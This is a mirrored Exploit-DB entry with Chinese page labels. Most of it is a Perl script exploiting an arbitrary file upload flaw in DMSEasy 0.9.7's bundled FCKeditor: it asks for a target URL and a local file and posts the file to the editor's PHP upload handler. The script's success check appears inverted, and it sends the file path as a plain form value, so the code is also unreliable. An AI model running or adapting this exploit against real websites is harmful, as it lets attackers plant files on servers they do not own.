DMSEasy 0.9.7 – ‘FCKeditor’ Arbitrary File Upload

• Exploit Database
• 35 阅读

• 作者： sh00t0ut
  日期： 2010-06-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13898/

• #!/usr/bin/perl
  use strict;
  use warnings;
  use LWP::UserAgent;
  use HTTP::Request::Common;
  print <<INTRO;
  +++++++++++++++++++++++++++++++++++++++++++++++++++++
  + DMSEasy0.9.7 (fckeditor) Arbitrary File Upload+
  + +
  +++++++++++++++++++++++++++++++++++++++++++++++++++++
  INTRO
  print "Enter URL(ie: http://target.com): ";
  chomp(my $url=<STDIN>);
  
  print "Enter File Path(path to local file to upload): ";
  chomp(my $file=<STDIN>);
  my $ua = LWP::UserAgent->new;
  my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
  Content_Type => 'form-data',
  Content=> [ NewFile => $file ] );
  if($re->is_success) {
  if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
  else { print "File Upload Is Disabled! Failed!\n"; }
  } else { print "HTTP Request Failed!\n"; }
  exit;